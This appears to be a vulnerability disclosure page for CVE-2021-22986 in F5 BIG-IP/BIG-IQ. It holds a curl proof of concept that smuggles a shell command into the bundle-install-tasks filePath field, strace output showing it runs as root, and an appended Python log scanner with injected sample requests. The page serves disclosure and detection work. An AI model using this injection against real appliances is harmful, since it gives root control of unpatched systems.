
BIG-IP / BIG-IQ iControl REST unauthenticated RCE (CVE-2021-22986)

This vulnerability allows an unauthenticated attacker with network access to the iControl REST interface, via the BIG-IP management interface and self IP addresses, to execute arbitrary system commands, create or delete files, and disable services. It can only be exploited through the control plane, not the data plane.

Details: https://attackerkb.com/topics/J6pWeg5saG/k03009991-icontrol-rest-unauthenticated-remote-command-execution-vulnerability-cve-2021-22986

PoC:

wvu@kharak:~$ curl -ksu admin:[redacted] https://192.168.123.134/mgmt/tm/access/bundle-install-tasks -d '{"filePath":"`id`"}' | jq .
{
  "filePath": "`id`",
  "toBeInstalledAppRpmsIndex": -1,
  "id": "36671f83-d1be-4f5a-a2e6-7f9442a2a76f",
  "status": "CREATED",
  "userReference": {
    "link": "https://localhost/mgmt/shared/authz/users/admin"
  },
  "identityReferences": [
    {
      "link": "https://localhost/mgmt/shared/authz/users/admin"
    }
  ],
  "ownerMachineId": "ac2562f0-e41f-4652-ba35-6a2b804b235e",
  "generation": 1,
  "lastUpdateMicros": 1615930477819656,
  "kind": "tm:access:bundle-install-tasks:iappbundleinstalltaskstate",
  "selfLink": "https://localhost/mgmt/tm/access/bundle-install-tasks/36671f83-d1be-4f5a-a2e6-7f9442a2a76f"
}
wvu@kharak:~$

The `id` command is executed as root:

[pid 64748] execve("/bin/tar", ["tar", "-xf", "uid=0(root)", "gid=0(root)", "groups=0(root)", "context=system_u:system_r:initrc_t:s0", "-O"], [/* 9 vars */]) = 0
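As an added defensive example (not part of the original page or of F5's software), the following Python checks request log lines for the pattern shown in the PoC above: a POST to the `bundle-install-tasks` endpoint whose JSON `filePath` carries shell metacharacters. The log format, client addresses and file paths in the sample are constructed placeholders, not F5's real log format.

```python
import json
import re
from typing import List, Optional, Tuple

# Endpoint abused in the PoC on this page.
TARGET_PATH = "/mgmt/tm/access/bundle-install-tasks"

# Shell metacharacters that have no business inside an RPM bundle path.
SHELL_META = re.compile(r"[`$;|&<>]")

# Constructed log format (assumption): "<client> <method> <path> <json body>"
LOG_LINE = re.compile(r"^(\S+) (\S+) (\S+) (.*)$")


def classify(line: str) -> Optional[str]:
    """Return a reason string if the line looks like exploitation, else None."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    client, method, path, body = m.groups()
    # Only task creation (POST) on the vulnerable endpoint is of interest.
    if method != "POST" or not path.startswith(TARGET_PATH):
        return None
    try:
        payload = json.loads(body)
    except json.JSONDecodeError:
        return f"unparseable JSON body to bundle-install-tasks from {client}"
    file_path = str(payload.get("filePath", ""))
    if SHELL_META.search(file_path):
        return f"shell metacharacters in filePath from {client}: {file_path!r}"
    if not file_path.startswith("/"):
        return f"relative filePath from {client}: {file_path!r}"
    return None


def scan(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line number, reason) for every suspicious line."""
    hits = []
    for n, line in enumerate(lines, 1):
        reason = classify(line)
        if reason:
            hits.append((n, reason))
    return hits


# Constructed sample traffic (not real logs); the .rpm path is a placeholder.
SAMPLE_LOG = [
    '10.0.0.5 GET /mgmt/tm/sys/version -',
    '10.0.0.9 POST /mgmt/tm/access/bundle-install-tasks {"filePath":"`id`"}',
    '10.0.0.7 POST /mgmt/tm/access/bundle-install-tasks {"filePath":"/shared/images/app.rpm"}',
    '10.0.0.9 POST /mgmt/tm/access/bundle-install-tasks {"filePath":"/tmp/a.rpm|id"}',
]

if __name__ == "__main__":
    for n, reason in scan(SAMPLE_LOG):
        print(f"line {n}: {reason}")
```

Lines 2 and 4 of the sample are flagged; the version lookup and the plain RPM path are not.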